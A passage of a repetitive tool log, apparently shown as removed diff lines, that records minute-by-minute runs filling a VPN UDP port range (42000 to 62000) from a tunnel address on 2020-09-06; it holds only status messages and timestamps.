-Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 14:43:04 -Starting port fill at 2020-09-06 14:44:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 14:44:04 -Starting port fill at 2020-09-06 14:45:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 14:45:05 -Starting port fill at 2020-09-06 14:46:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 14:46:04 -Starting port fill at 2020-09-06 14:47:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -Finished port fill at 2020-09-06 14:47:06 -Starting port fill at 2020-09-06 14:48:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -Finished port fill at 2020-09-06 14:48:06 -Starting port fill at 2020-09-06 14:49:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 14:49:04 -Starting port fill at 2020-09-06 14:50:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 14:50:06 -Starting port fill at 2020-09-06 14:51:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 14:51:05 -Starting port fill at 2020-09-06 14:52:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 14:52:04 -Starting port fill at 2020-09-06 14:53:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 14:53:04 -Starting port fill at 2020-09-06 14:54:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 14:54:04 -Starting port fill at 2020-09-06 14:55:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 14:55:06 -Starting port fill at 2020-09-06 14:56:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 14:56:05 -Starting port fill at 2020-09-06 14:57:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 14:57:05 -Starting port fill at 2020-09-06 14:58:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 14:58:06 -Starting port fill at 2020-09-06 14:59:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -Finished port fill at 2020-09-06 14:59:07 -Starting port fill at 2020-09-06 15:00:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 15:00:05 -Starting port fill at 2020-09-06 15:01:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -Finished port fill at 2020-09-06 15:01:06 -Starting port fill at 2020-09-06 15:02:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 15:02:06 -Starting port fill at 2020-09-06 15:03:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -Finished port fill at 2020-09-06 15:03:06 -Starting port fill at 2020-09-06 15:04:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -Finished port fill at 2020-09-06 15:04:06 -Starting port fill at 2020-09-06 15:05:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 15:05:04 -Starting port fill at 2020-09-06 15:06:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 15:06:04 -Starting port fill at 2020-09-06 15:07:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 15:07:05 -Starting port fill at 2020-09-06 15:08:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 15:08:04 -Starting port fill at 2020-09-06 15:09:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 